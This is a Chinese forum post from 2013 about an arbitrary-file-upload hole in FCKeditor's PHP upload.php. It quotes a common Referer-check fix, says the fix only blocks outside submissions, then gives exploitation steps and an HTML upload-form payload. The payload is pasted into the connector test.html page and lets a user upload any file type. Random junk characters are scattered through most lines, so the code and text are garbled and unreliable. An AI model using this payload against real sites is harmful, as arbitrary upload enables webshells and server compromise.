漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
p) L; P& x1 Z网上给出的修复方案是
1 p, U9 x2 A9 @$ v修复方法,删除FCK编辑器用其他的编辑器
J- Q* M% m' C或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件% D8 b' e3 [. f' u
在' Q" `6 o) W: {% ~
require(‘config.php’);
1 L: @& }' K( `; _$ `require(‘util.php’);
+ j1 G$ {* Z& Y的下面添加以下代码—————————–
, z9 c* E8 B8 f" l! O& Y//防止外部提交% { Z7 h( H1 a0 m7 i
function outsidepost()
* e9 ]) K- f/ `7 O- a7 _{2 e" H8 y- j6 Y( S0 v1 ?
$servername=$_SERVER['SERVER_NAME'];* z- o8 X1 @- m) P/ C4 n2 `9 q
$sub_from=@$_SERVER['HTTP_REFERER'];
! H" P% Z( ^3 a4 u$sub_len=strlen($servername);
" I7 D9 ~6 L; g9 q" p8 J( z3 a( Y$checkfrom=substr($sub_from,7,$sub_len); |2 M% \9 P5 t2 T9 n1 N7 J
if($checkfrom!=$servername){' A: t& o9 w/ v1 s; U
echo(“you don’t outsidepost!”);0 Q, |8 E/ Y$ a+ R g5 v6 o* z2 l
exit;
, J1 @* B8 J4 L- |7 a( I6 n}6 o; y" E# o& E% N2 p( n; F
}/ r* v6 b# n+ h- N- m
outsidepost();
& X* L( I* b6 R2 \/ j! }防止外部提交,但是没有防止内部提交,$ M" J1 D( s, E3 A
利用方法:
' U- c4 B, `2 X7 t3 y8 u: w1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
6 K _1 f' @8 l0 ^/ ]1 N3 i8 K2,在Current Folder 框输入
# I2 n8 L) r! O0 B+ c! Q<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
) k* l: A9 D/ y2 L& v8 n然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。* t1 Q, W: c) P0 ?7 a
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对